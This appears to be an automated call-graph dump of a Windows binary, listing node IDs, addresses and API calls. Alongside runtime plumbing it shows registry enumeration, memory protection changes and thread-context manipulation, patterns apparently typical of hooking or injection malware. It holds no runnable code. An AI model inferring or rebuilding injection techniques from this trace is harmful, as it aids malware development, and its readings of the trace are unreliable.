RegCloseKey 7624->7625 7625->7619 7648 28092396168 7626->7648 7628 28092381283 GetProcessHeap 7629 280923812ae __std_exception_copy 7628->7629 7629->7584 7631 280923810bf 7630->7631 7632 280923811b5 RegCloseKey 7630->7632 7631->7632 7633 280923810cf RegEnumValueW 7631->7633 7632->7597 7635 28092381125 __std_exception_copy 7633->7635 7634 2809238114e GetProcessHeap 7634->7635 7635->7632 7635->7633 7635->7634 7636 2809238116e GetProcessHeap HeapFree 7635->7636 7636->7635 7638 2809238148a RegCloseKey 7637->7638 7639 28092381327 GetProcessHeap 7637->7639 7638->7595 7645 2809238133e __std_exception_copy 7639->7645 7640 28092381352 RegEnumValueW 7640->7645 7641 28092381476 GetProcessHeap HeapFree 7641->7638 7643 2809238141e lstrlenW GetProcessHeap 7643->7645 7644 280923813d3 GetProcessHeap 7644->7645 7645->7640 7645->7641 7645->7643 7645->7644 7646 280923813f3 GetProcessHeap HeapFree 7645->7646 7647 28092381443 StrCpyW 7645->7647 7650 2809238152c 7645->7650 7646->7643 7647->7645 7649 28092396178 7648->7649 7651 2809238157c 7650->7651 7652 28092381546 7650->7652 7651->7645 7652->7651 7653 2809238155d StrCmpIW 7652->7653 7654 28092381565 StrCmpW 7652->7654 7653->7652 7654->7652 8545 2809238253c 8547 280923825bb 8545->8547 8546 280923827aa 8547->8546 8548 2809238261d GetFileType 8547->8548 8549 2809238262b StrCpyW 8548->8549 8550 28092382641 8548->8550 8551 28092382650 8549->8551 8561 28092381a40 GetFinalPathNameByHandleW 8550->8561 8555 2809238265a 8551->8555 8559 280923826ff 8551->8559 8553 28092383844 StrCmpNIW 8553->8555 8554 28092383844 StrCmpNIW 8554->8559 8555->8546 8555->8553 8566 28092383044 StrCmpIW 8555->8566 8570 28092381cac 8555->8570 8558 28092383044 4 API calls 8558->8559 8559->8546 8559->8554 8559->8558 8560 28092381cac 2 API calls 8559->8560 8560->8559 8562 28092381aa9 8561->8562 8563 28092381a6a StrCmpNIW 8561->8563 8562->8551 8563->8562 8564 28092381a84 lstrlenW 8563->8564 8564->8562 8565 28092381a96 StrCpyW 8564->8565 8565->8562 8567 2809238308d PathCombineW 8566->8567 8568 28092383076 StrCpyW StrCatW 8566->8568 8569 28092383096 8567->8569 8568->8569 8569->8555 8571 28092381cc3 8570->8571 8572 28092381ccc 8570->8572 8573 2809238152c 2 API calls 8571->8573 8572->8555 8573->8572 8574 28092382330 8576 280923823ae 8574->8576 8575 280923824ea 8576->8575 8577 28092382413 GetFileType 8576->8577 8578 28092382421 StrCpyW 8577->8578 8579 28092382435 8577->8579 8583 28092382442 8578->8583 8580 28092381a40 4 API calls 8579->8580 8580->8583 8581 28092383844 StrCmpNIW 8581->8583 8582 28092383044 4 API calls 8582->8583 8583->8575 8583->8581 8583->8582 8584 28092381cac 2 API calls 8583->8584 8584->8583 9338 28092387830 9339 2809238784c 9338->9339 9340 28092387851 9338->9340 9342 28092387960 9339->9342 9343 28092387983 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9342->9343 9344 280923879f7 9342->9344 9343->9344 9344->9340 9345 2809238f830 GetProcessHeap 8585 28092394d35 8586 28092389634 _CreateFrameInfo 5 API calls 8585->8586 8587 28092394d4d 8586->8587 8588 28092389634 _CreateFrameInfo 5 API calls 8587->8588 8589 28092394d68 8588->8589 8590 28092389634 _CreateFrameInfo 5 API calls 8589->8590 8591 28092394d7c 8590->8591 8592 28092389634 _CreateFrameInfo 5 API calls 8591->8592 8593 28092394dbe 8592->8593 9038 28092387fb4 9039 280923893e8 __std_exception_copy 18 API calls 9038->9039 9040 28092387fdd 9039->9040 9346 28092385234 9347 2809238523a 9346->9347 9348 28092387870 2 API calls 9347->9348 9349 2809238527d 9348->9349 9351 2809238529e 9349->9351 9358 28092383cc0 9349->9358 9353 28092385337 9353->9351 9355 280923854bd 9353->9355 9362 28092387440 9353->9362 9354 280923855bb 9355->9354 9356 28092385637 VirtualProtect 9355->9356 9356->9351 9357 28092385663 GetLastError 9356->9357 9357->9351 9359 28092383cdd 9358->9359 9361 28092383d4c 9359->9361 9368 28092383f30 9359->9368 9361->9353 9363 28092387487 9362->9363 9393 28092387210 9363->9393 9366 28092387940 _log10_special 4 API calls 9367 280923874b1 9366->9367 9367->9353 9369 28092383f54 9368->9369 9373 28092383f77 9368->9373 9369->9373 9382 280923839e0 9369->9382 9371 28092384013 9377 2809238402f 9371->9377 9380 280923839e0 3 API calls 9371->9380 9372 28092383fdd 9372->9371 9379 280923839e0 3 API calls 9372->9379 9375 28092383fad 9373->9375 9388 28092383b10 9373->9388 9375->9372 9376 28092383b10 2 API calls 9375->9376 9376->9372 9378 2809238404b 9377->9378 9381 28092383b10 2 API calls 9377->9381 9378->9361 9379->9371 9380->9377 9381->9378 9387 28092383a01 9382->9387 9383 28092383a70 9383->9373 9384 28092383a56 VirtualQuery 9384->9383 9384->9387 9385 28092383a8a VirtualAlloc 9385->9383 9386 28092383abb GetLastError 9385->9386 9386->9383 9386->9387 9387->9383 9387->9384 9387->9385 9391 28092383b28 9388->9391 9389 28092383b97 9389->9375 9390 28092383b7d VirtualQuery 9390->9389 9390->9391 9391->9389 9391->9390 9392 28092383be2 GetLastError 9391->9392 9392->9389 9392->9391 9394 2809238722b 9393->9394 9395 2809238724f 9394->9395 9396 28092387241 SetLastError 9394->9396 9395->9366 9396->9395 9397 28092389234 9404 2809238977c 9397->9404 9401 2809238924a 9402 28092389241 9401->9402 9414 280923897c4 9401->9414 9405 28092389784 9404->9405 9407 280923897b5 9405->9407 9408 2809238923d 9405->9408 9418 2809238a040 9405->9418 9409 280923897c4 __vcrt_uninitialize_locks DeleteCriticalSection 9407->9409 9408->9402 9410 28092389710 9408->9410 9409->9408 9411 28092389720 9410->9411 9412 28092389fec _CreateFrameInfo 5 API calls 9411->9412 9413 28092389739 __vcrt_uninitialize_ptd 9411->9413 9412->9413 9413->9401 9415 280923897ef 9414->9415 9416 280923897d2 DeleteCriticalSection 9415->9416 9417 280923897f3 9415->9417 9416->9415 9417->9402 9419 28092389dc4 __vcrt_InitializeCriticalSectionEx 4 API calls 9418->9419 9420 2809238a076 9419->9420 9421 2809238a08b InitializeCriticalSectionAndSpinCount 9420->9421 9422 2809238a080 9420->9422 9421->9422 9422->9405 8594 2809238c534 8597 2809238c2e4 8594->8597 8604 2809238c2ac 8597->8604 8602 2809238c268 5 API calls 8603 2809238c317 8602->8603 8605 2809238c2bc 8604->8605 8606 2809238c2c1 8604->8606 8607 2809238c268 5 API calls 8605->8607 8608 2809238c2c8 8606->8608 8607->8606 8609 2809238c2d8 8608->8609 8610 2809238c2dd 8608->8610 8611 2809238c268 5 API calls 8609->8611 8610->8602 8611->8610 7702 280923914a8 7703 280923914b0 7702->7703 7704 280923914c5 7703->7704 7706 280923914de 7703->7706 7711 2809238d6ac 7704->7711 7708 280923914d5 7706->7708 7717 2809238e1b4 7706->7717 7725 2809238cfa0 7711->7725 7713 2809238d6b5 7714 2809238d570 7713->7714 7874 2809238d408 7714->7874 7718 2809238e1d8 7717->7718 7719 2809238e1d3 7717->7719 7718->7719 7720 2809238ce28 _invalid_parameter_noinfo 15 API calls 7718->7720 7719->7708 7721 2809238e1f3 7720->7721 7972 280923903fc 7721->7972 7726 2809238cfb5 __vcrt_InitializeCriticalSectionEx 7725->7726 7727 2809238cfe1 FlsSetValue 7726->7727 7730 2809238cfd1 _invalid_parameter_noinfo 7726->7730 7728 2809238cff3 7727->7728 7727->7730 7741 2809238d6cc 7728->7741 7730->7713 7732 2809238d020 FlsSetValue 7735 2809238d02c FlsSetValue 7732->7735 7736 2809238d03e 7732->7736 7733 2809238d010 FlsSetValue 7734 2809238d019 7733->7734 7745 2809238d744 7734->7745 7735->7734 7750 2809238cb94 7736->7750 7740 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7740->7730 7744 2809238d6dd __std_exception_copy 7741->7744 7742 2809238d6ac __std_exception_copy 5 API calls 7743 2809238d002 7742->7743 7743->7732 7743->7733 7744->7742 7744->7743 7746 2809238d749 HeapFree 7745->7746 7747 2809238d77a 7745->7747 7746->7747 7748 2809238d764 Concurrency::details::SchedulerProxy::DeleteThis __vcrt_InitializeCriticalSectionEx 7746->7748 7747->7730 7749 2809238d6ac __std_exception_copy 4 API calls 7748->7749 7749->7747 7751 2809238cc46 __std_exception_copy 7750->7751 7754 2809238caec 7751->7754 7753 2809238cc5b 7753->7740 7755 2809238cb08 7754->7755 7758 2809238cd7c 7755->7758 7757 2809238cb1e 7757->7753 7759 2809238cdc4 Concurrency::details::SchedulerProxy::DeleteThis 7758->7759 7760 2809238cd98 Concurrency::details::SchedulerProxy::DeleteThis 7758->7760 7759->7757 7760->7759 7762 280923907b4 7760->7762 7763 28092390850 7762->7763 7766 280923907d7 7762->7766 7764 280923908a3 7763->7764 7767 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7763->7767 7828 28092390954 7764->7828 7766->7763 7768 28092390816 7766->7768 7773 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7766->7773 7769 28092390874 7767->7769 7770 28092390838 7768->7770 7776 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7768->7776 7771 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7769->7771 7772 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7770->7772 7774 28092390888 7771->7774 7778 28092390844 7772->7778 7779 2809239080a 7773->7779 7775 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7774->7775 7781 28092390897 7775->7781 7782 2809239082c 7776->7782 7777 2809239090e 7783 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7778->7783 7788 28092392fc8 7779->7788 7780 280923908af 7780->7777 7784 2809238d744 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 7780->7784 7786 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7781->7786 7816 280923930d4 7782->7816 7783->7763 7784->7780 7786->7764 7789 28092392fd1 7788->7789 7814 280923930cc 7788->7814 7790 28092392feb 7789->7790 7791 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7789->7791 7792 28092392ffd 7790->7792 7793 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7790->7793 7791->7790 7794 2809239300f 7792->7794 7795 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7792->7795 7793->7792 7796 28092393021 7794->7796 7797 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7794->7797 7795->7794 7798 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7796->7798 7799 28092393033 7796->7799 7797->7796 7798->7799 7800 28092393045 7799->7800 7802 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7799->7802 7801 28092393057 7800->7801 7803 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7800->7803 7804 28092393069 7801->7804 7805 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7801->7805 7802->7800 7803->7801 7806 2809239307b 7804->7806 7807 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7804->7807 7805->7804 7808 2809239308d 7806->7808 7809 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7806->7809 7807->7806 7810 280923930a2 7808->7810 7812 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7808->7812 7809->7808 7811 280923930b7 7810->7811 7813 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7810->7813 7811->7814 7815 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7811->7815 7812->7810 7813->7811 7814->7768 7815->7814 7817 280923930d9 7816->7817 7826 2809239313a 7816->7826 7818 280923930f2 7817->7818 7819 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7817->7819 7820 28092393104 7818->7820 7821 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7818->7821 7819->7818 7822 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7820->7822 7824 28092393116 7820->7824 7821->7820 7822->7824 7823 28092393128 7823->7826 7827 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7823->7827 7824->7823 7825 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7824->7825 7825->7823 7826->7770 7827->7826 7829 28092390959 7828->7829 7830 28092390985 7828->7830 7829->7830 7834 28092393174 7829->7834 7830->7780 7833 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7833->7830 7835 2809239317d 7834->7835 7869 2809239097d 7834->7869 7870 28092393140 7835->7870 7838 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7839 280923931a6 7838->7839 7840 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7839->7840 7841 280923931b4 7840->7841 7842 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7841->7842 7843 280923931c2 7842->7843 7844 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7843->7844 7845 280923931d1 7844->7845 7846 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7845->7846 7847 280923931dd 7846->7847 7848 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7847->7848 7849 280923931e9 7848->7849 7850 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7849->7850 7851 280923931f5 7850->7851 7852 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7851->7852 7853 28092393203 7852->7853 7854 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7853->7854 7855 28092393211 7854->7855 7856 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7855->7856 7857 2809239321f 7856->7857 7858 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7857->7858 7859 2809239322d 7858->7859 7860 28092393140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7859->7860 7861 2809239323c 7860->7861 7862 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7861->7862 7863 28092393248 7862->7863 7864 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7863->7864 7865 28092393254 7864->7865 7866 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7865->7866 7867 28092393260 7866->7867 7868 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7867->7868 7868->7869 7869->7833 7871 28092393167 7870->7871 7872 28092393156 7870->7872 7871->7838 7872->7871 7873 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7872->7873 7873->7872 7875 2809238d433 7874->7875 7882 2809238d4a4 7875->7882 7877 2809238d45a 7880 2809238d47d 7877->7880 7888 2809238c7a0 7877->7888 7879 2809238c7a0 _invalid_parameter_noinfo 18 API calls 7881 2809238d492 7879->7881 7880->7879 7880->7881 7881->7708 7899 2809238d1ec 7882->7899 7884 2809238d4df _invalid_parameter_noinfo 7884->7877 7885 2809238d4ce _invalid_parameter_noinfo 7885->7884 7886 2809238d408 _invalid_parameter_noinfo 18 API calls 7885->7886 7887 2809238d589 7886->7887 7887->7877 7889 2809238c7f8 7888->7889 7890 2809238c7af __vcrt_InitializeCriticalSectionEx 7888->7890 7889->7880 7891 2809238d068 _invalid_parameter_noinfo 8 API calls 7890->7891 7892 2809238c7de _invalid_parameter_noinfo 7891->7892 7892->7889 7893 2809238c7a0 _invalid_parameter_noinfo 18 API calls 7892->7893 7894 2809238c827 7893->7894 7917 28092390430 7894->7917 7900 2809238d208 __vcrt_InitializeCriticalSectionEx 7899->7900 7902 2809238d233 _invalid_parameter_noinfo 7899->7902 7903 2809238d068 7900->7903 7902->7885 7904 2809238d087 FlsGetValue 7903->7904 7906 2809238d09c 7903->7906 7905 2809238d094 7904->7905 7904->7906 7905->7902 7906->7905 7907 2809238d6cc __std_exception_copy 5 API calls 7906->7907 7908 2809238d0be 7907->7908 7909 2809238d0dc FlsSetValue 7908->7909 7912 2809238d0cc 7908->7912 7910 2809238d0e8 FlsSetValue 7909->7910 7911 2809238d0fa 7909->7911 7910->7912 7913 2809238cb94 __std_exception_copy 5 API calls 7911->7913 7915 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7912->7915 7914 2809238d102 7913->7914 7916 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7914->7916 7915->7905 7916->7905 7918 28092390449 7917->7918 7920 2809238c84f 7917->7920 7918->7920 7925 28092390a5c 7918->7925 7921 2809239049c 7920->7921 7922 280923904b5 7921->7922 7924 2809238c85f 7921->7924 7922->7924 7969 2809238ecf0 7922->7969 7924->7880 7930 2809238ce28 7925->7930 7927 28092390a6b 7929 28092390aa4 7927->7929 7965 28092390acc 7927->7965 7929->7920 7931 2809238ce3d __vcrt_InitializeCriticalSectionEx 7930->7931 7932 2809238ce69 FlsSetValue 7931->7932 7933 2809238ce4c FlsGetValue 7931->7933 7935 2809238ce7b 7932->7935 7946 2809238ce59 _invalid_parameter_noinfo 7932->7946 7934 2809238ce63 7933->7934 7933->7946 7934->7932 7936 2809238d6cc __std_exception_copy 5 API calls 7935->7936 7937 2809238ce8a 7936->7937 7938 2809238cea8 FlsSetValue 7937->7938 7939 2809238ce98 FlsSetValue 7937->7939 7942 2809238ceb4 FlsSetValue 7938->7942 7943 2809238cec6 7938->7943 7941 2809238cea1 7939->7941 7940 2809238cee2 7940->7927 7944 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7941->7944 7942->7941 7945 2809238cb94 __std_exception_copy 5 API calls 7943->7945 7944->7946 7947 2809238cece 7945->7947 7946->7940 7949 2809238cf28 FlsSetValue 7946->7949 7950 2809238cf0d FlsGetValue 7946->7950 7948 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7947->7948 7948->7946 7952 2809238cf35 7949->7952 7955 2809238cf1a 7949->7955 7951 2809238cf22 7950->7951 7950->7955 7951->7949 7953 2809238d6cc __std_exception_copy 5 API calls 7952->7953 7954 2809238cf44 7953->7954 7956 2809238cf62 FlsSetValue 7954->7956 7957 2809238cf52 FlsSetValue 7954->7957 7955->7927 7959 2809238cf6e FlsSetValue 7956->7959 7960 2809238cf80 7956->7960 7958 2809238cf5b 7957->7958 7961 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7958->7961 7959->7958 7962 2809238cb94 __std_exception_copy 5 API calls 7960->7962 7961->7955 7963 2809238cf88 7962->7963 7964 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7963->7964 7964->7955 7966 28092390aeb 7965->7966 7967 28092390ade Concurrency::details::SchedulerProxy::DeleteThis 7965->7967 7966->7929 7967->7966 7968 280923907b4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7967->7968 7968->7966 7970 2809238ce28 _invalid_parameter_noinfo 15 API calls 7969->7970 7971 2809238ecf9 7970->7971 7973 28092390411 7972->7973 7974 2809238e216 7972->7974 7973->7974 7975 28092390a5c _invalid_parameter_noinfo 15 API calls 7973->7975 7976 28092390468 7974->7976 7975->7974 7977 2809239047d 7976->7977 7978 28092390490 7976->7978 7977->7978 7979 2809238ecf0 _invalid_parameter_noinfo 15 API calls 7977->7979 7978->7719 7979->7978 8612 2809238d128 8613 2809238d138 8612->8613 8614 2809238cfa0 __std_exception_copy 5 API calls 8613->8614 8615 2809238d143 __vcrt_uninitialize_ptd 8613->8615 8614->8615 9041 280923935ab 9042 280923935eb 9041->9042 9043 28092393850 9041->9043 9042->9043 9045 28092393832 9042->9045 9046 2809239361f 9042->9046 9044 28092393846 9043->9044 9048 28092394360 _log10_special 10 API calls 9043->9048 9049 28092394360 9045->9049 9048->9044 9052 28092394380 9049->9052 9053 2809239439a 9052->9053 9054 2809239437b 9053->9054 9056 280923941c0 9053->9056 9054->9044 9057 28092394200 _log10_special 9056->9057 9060 2809239426c _log10_special 9057->9060 9067 28092394480 9057->9067 9059 280923942a9 9074 280923947b0 9059->9074 9060->9059 9061 28092394279 9060->9061 9070 2809239409c 9061->9070 9064 280923942a7 _log10_special 9065 28092387940 _log10_special 4 API calls 9064->9065 9066 280923942d1 9065->9066 9066->9054 9080 280923944a8 9067->9080 9071 280923940e0 _log10_special 9070->9071 9072 280923940f5 9071->9072 9073 280923947b0 _log10_special 5 API calls 9071->9073 9072->9064 9073->9072 9075 280923947b9 9074->9075 9076 280923947d0 9074->9076 9078 280923947c8 9075->9078 9079 2809238d6ac __std_exception_copy 5 API calls 9075->9079 9077 2809238d6ac __std_exception_copy 5 API calls 9076->9077 9077->9078 9078->9064 9079->9078 9081 280923944e7 _raise_exc _clrfp 9080->9081 9082 280923946fc RaiseException 9081->9082 9083 280923944a2 9082->9083 9083->9060 8616 28092382b2c 8617 28092382b9d 8616->8617 8618 28092382ee0 8617->8618 8619 28092382bc9 GetModuleHandleA 8617->8619 8620 28092382bdb GetProcAddress 8619->8620 8621 28092382bed 8619->8621 8620->8621 8621->8618 8622 28092382c14 StrCmpNIW 8621->8622 8622->8618 8626 28092382c39 8622->8626 8623 2809238199c 6 API calls 8623->8626 8624 28092382d4b lstrlenW 8624->8626 8625 28092382e05 lstrlenW 8625->8626 8626->8618 8626->8623 8626->8624 8626->8625 8627 28092383844 StrCmpNIW 8626->8627 8628 2809238152c StrCmpIW StrCmpW 8626->8628 8627->8626 8628->8626 9423 2809238202c 9424 2809238205d 9423->9424 9425 28092382173 9424->9425 9431 28092382081 9424->9431 9432 2809238213e 9424->9432 9426 28092382178 9425->9426 9427 280923821e7 9425->9427 9441 28092382f04 GetProcessHeap 9426->9441 9429 28092382f04 9 API calls 9427->9429 9427->9432 9429->9432 9430 280923820b9 StrCmpNIW 9430->9431 9431->9430 9431->9432 9434 28092381bf4 9431->9434 9435 28092381c1b GetProcessHeap 9434->9435 9436 28092381c8f 9434->9436 9437 28092381c41 __std_exception_copy 9435->9437 9436->9431 9437->9436 9438 28092381c77 GetProcessHeap HeapFree 9437->9438 9439 2809238152c 2 API calls 9437->9439 9438->9436 9440 28092381c6e 9439->9440 9440->9438 9443 28092382f40 __std_exception_copy 9441->9443 9442 28092383015 GetProcessHeap HeapFree 9442->9432 9443->9442 9444 28092383010 9443->9444 9445 28092382fa2 StrCmpNIW 9443->9445 9446 28092381bf4 5 API calls 9443->9446 9444->9442 9445->9443 9446->9443 7989 28092391aa0 7992 2809238ec90 7989->7992 7993 2809238ece2 7992->7993 7994 2809238ec9d 7992->7994 7998 2809238cefc 7994->7998 7996 2809238eccc 8015 2809238e968 7996->8015 7999 2809238cf28 FlsSetValue 7998->7999 8000 2809238cf0d FlsGetValue 7998->8000 8002 2809238cf35 7999->8002 8005 2809238cf1a 7999->8005 8001 2809238cf22 8000->8001 8000->8005 8001->7999 8003 2809238d6cc __std_exception_copy 5 API calls 8002->8003 8004 2809238cf44 8003->8004 8006 2809238cf62 FlsSetValue 8004->8006 8007 2809238cf52 FlsSetValue 8004->8007 8005->7996 8009 2809238cf6e FlsSetValue 8006->8009 8010 2809238cf80 8006->8010 8008 2809238cf5b 8007->8008 8011 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8008->8011 8009->8008 8012 2809238cb94 __std_exception_copy 5 API calls 8010->8012 8011->8005 8013 2809238cf88 8012->8013 8014 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8013->8014 8014->8005 8038 2809238ebd8 8015->8038 8022 2809238e9d3 8023 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8022->8023 8035 2809238e9ba 8023->8035 8024 2809238e9e2 8024->8024 8057 2809238ed0c 8024->8057 8027 2809238eade 8028 2809238d6ac __std_exception_copy 5 API calls 8027->8028 8029 2809238eae3 8028->8029 8031 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8029->8031 8030 2809238eb39 8037 2809238eba0 8030->8037 8068 2809238e498 8030->8068 8031->8035 8032 2809238eaf8 8032->8030 8036 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8032->8036 8034 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8034->8035 8035->7993 8036->8030 8037->8034 8040 2809238ebfb 8038->8040 8039 2809238ec05 8042 2809238e99d 8039->8042 8043 2809238cefc 10 API calls 8039->8043 8040->8039 8041 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8040->8041 8041->8039 8046 2809238e668 8042->8046 8044 2809238eccc 8043->8044 8045 2809238e968 38 API calls 8044->8045 8045->8042 8047 2809238e1b4 15 API calls 8046->8047 8048 2809238e67c 8047->8048 8049 2809238e688 GetOEMCP 8048->8049 8050 2809238e69a 8048->8050 8052 2809238e6af 8049->8052 8051 2809238e69f GetACP 8050->8051 8050->8052 8051->8052 8052->8035 8053 2809238ca0c 8052->8053 8056 2809238ca1b __std_exception_copy 8053->8056 8054 2809238d6ac __std_exception_copy 5 API calls 8055 2809238ca55 8054->8055 8055->8022 8055->8024 8056->8054 8056->8055 8058 2809238e668 17 API calls 8057->8058 8059 2809238ed39 8058->8059 8060 2809238ee8f 8059->8060 8062 2809238ed76 IsValidCodePage 8059->8062 8067 2809238ed90 8059->8067 8061 28092387940 _log10_special 4 API calls 8060->8061 8063 2809238ead5 8061->8063 8062->8060 8064 2809238ed87 8062->8064 8063->8027 8063->8032 8065 2809238edb6 GetCPInfo 8064->8065 8064->8067 8065->8060 8065->8067 8080 2809238e780 8067->8080 8069 2809238e4b4 8068->8069 8070 2809238d6ac __std_exception_copy 5 API calls 8069->8070 8073 2809238e4e1 8069->8073 8071 2809238e550 8070->8071 8072 2809238d570 _invalid_parameter_noinfo 18 API calls 8071->8072 8072->8073 8074 2809238d6ac __std_exception_copy 5 API calls 8073->8074 8076 2809238e593 8073->8076 8075 2809238e5f1 8074->8075 8077 2809238d570 _invalid_parameter_noinfo 18 API calls 8075->8077 8078 2809238e62d 8076->8078 8079 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8076->8079 8077->8076 8078->8037 8079->8078 8081 2809238e7bd GetCPInfo 8080->8081 8090 2809238e8b3 8080->8090 8086 2809238e7d0 8081->8086 8081->8090 8082 28092387940 _log10_special 4 API calls 8083 2809238e952 8082->8083 8083->8060 8091 28092391544 8086->8091 8089 28092391a08 24 API calls 8089->8090 8090->8082 8092 2809238e1b4 15 API calls 8091->8092 8093 28092391586 8092->8093 8094 280923915c3 8093->8094 8095 28092391680 8093->8095 8096 2809238ca0c 5 API calls 8093->8096 8100 280923915ec 8093->8100 8097 28092387940 _log10_special 4 API calls 8094->8097 8095->8094 8099 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8095->8099 8096->8100 8098 2809238e847 8097->8098 8102 28092391a08 8098->8102 8099->8094 8100->8095 8101 28092391666 GetStringTypeW 8100->8101 8101->8095 8103 2809238e1b4 15 API calls 8102->8103 8104 28092391a2d 8103->8104 8107 280923916d4 8104->8107 8110 28092391715 8107->8110 8108 280923919dd 8109 28092387940 _log10_special 4 API calls 8108->8109 8111 2809238e87a 8109->8111 8110->8108 8112 2809238ca0c 5 API calls 8110->8112 8114 28092391797 8110->8114 8123 28092391895 8110->8123 8111->8089 8112->8114 8113 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8113->8108 8114->8123 8129 2809238f67c 8114->8129 8116 2809239183d 8117 28092391855 8116->8117 8118 280923918a6 8116->8118 8116->8123 8120 2809238f67c 5 API calls 8117->8120 8117->8123 8119 2809238ca0c 5 API calls 8118->8119 8121 28092391978 8118->8121 8122 280923918c4 8118->8122 8119->8122 8120->8123 8121->8123 8124 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8121->8124 8122->8123 8125 2809238f67c 5 API calls 8122->8125 8123->8108 8123->8113 8124->8123 8126 28092391944 8125->8126 8126->8121 8127 28092391992 8126->8127 8127->8123 8128 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8127->8128 8128->8123 8135 2809238f394 8129->8135 8132 2809238f6c2 _invalid_parameter_noinfo 8132->8116 8134 2809238f72b LCMapStringW 8134->8132 8136 2809238f3f1 8135->8136 8141 2809238f3ec __vcrt_InitializeCriticalSectionEx 8135->8141 8136->8132 8143 2809238f768 8136->8143 8137 2809238f421 LoadLibraryExW 8139 2809238f4f6 8137->8139 8137->8141 8138 2809238f516 GetProcAddress 8138->8136 8139->8138 8140 2809238f50d FreeLibrary 8139->8140 8140->8138 8141->8136 8141->8137 8141->8138 8142 2809238f480 LoadLibraryExW 8141->8142 8142->8139 8142->8141 8144 2809238f394 4 API calls 8143->8144 8145 2809238f796 _invalid_parameter_noinfo 8144->8145 8145->8134 8146 28092385ca3 8147 28092385cb0 8146->8147 8148 28092385cbc GetThreadContext 8147->8148 8155 28092385e1a 8147->8155 8149 28092385ce2 8148->8149 8148->8155 8153 28092385d09 8149->8153 8149->8155 8150 28092385efe 8152 28092385f1e 8150->8152 8157 280923843e0 VirtualFree 8150->8157 8151 28092385e41 VirtualProtect FlushInstructionCache 8151->8155 8154 28092384df0 3 API calls 8152->8154 8156 28092385d8d 8153->8156 8158 28092385d66 SetThreadContext 8153->8158 8161 28092385f23 8154->8161 8155->8150 8155->8151 8157->8152 8158->8156 8159 28092385f77 8162 28092387940 _log10_special 4 API calls 8159->8162 8160 28092385f37 ResumeThread 8160->8161 8161->8159 8161->8160 8163 28092385fbf 8162->8163 8164 280923814a4 8165 280923814e1 GetProcessHeap 